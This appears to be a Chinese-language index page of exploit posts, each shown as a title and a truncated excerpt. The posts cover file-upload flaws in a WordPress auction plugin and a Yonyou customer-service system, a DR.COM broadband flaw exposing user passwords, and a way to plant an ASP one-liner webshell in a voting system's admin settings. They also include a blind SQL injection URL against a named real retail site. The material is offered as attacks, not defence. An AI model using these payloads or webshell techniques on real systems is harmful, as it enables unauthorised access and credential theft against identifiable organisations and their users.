-
WordPress Sitemile Auctions插件任意文件上传漏洞
受影响系统:WordPress Sitemile Auctions Plugin 2.x描述:------------------------------------------------------------------------...
-
DR.COM城市热点GetPassword-0day漏洞&exp
DR.COM城市热点宽带,很多城市都用这个吧?市区,政府,企业,运营商,大学等等。。都用这套软件提供接入宽带服务 最近研究了下,发现个漏洞,在DR.COM USS用户自助服务登录的WEB服务器 可以直接查看到指定ID用户的密码,也就是查询密...
-
校无忧投票系统利用0day
后台拿shell的方法呢, 在网站配置的地方插入一句话,这个普通的一句话是不能用的要用变异的一句话,插入,测试成功 一句话: view sourceprint?1 "%><%execute(request("...
-
美特斯邦威官方商城几个盲注
http://act.banggo.com/Ajax/adCodeInfo?time=0.7242165785281457&callback=jsonp1335235877318&adposid=175%09and%09sl...
-
用友ICC网站客服系统任意文件上传漏洞
<?php/** * screenImagesSave.php * */require_once('../global.inc.php'); //get request.$ft = intval($_REQUEST['ft']); /...
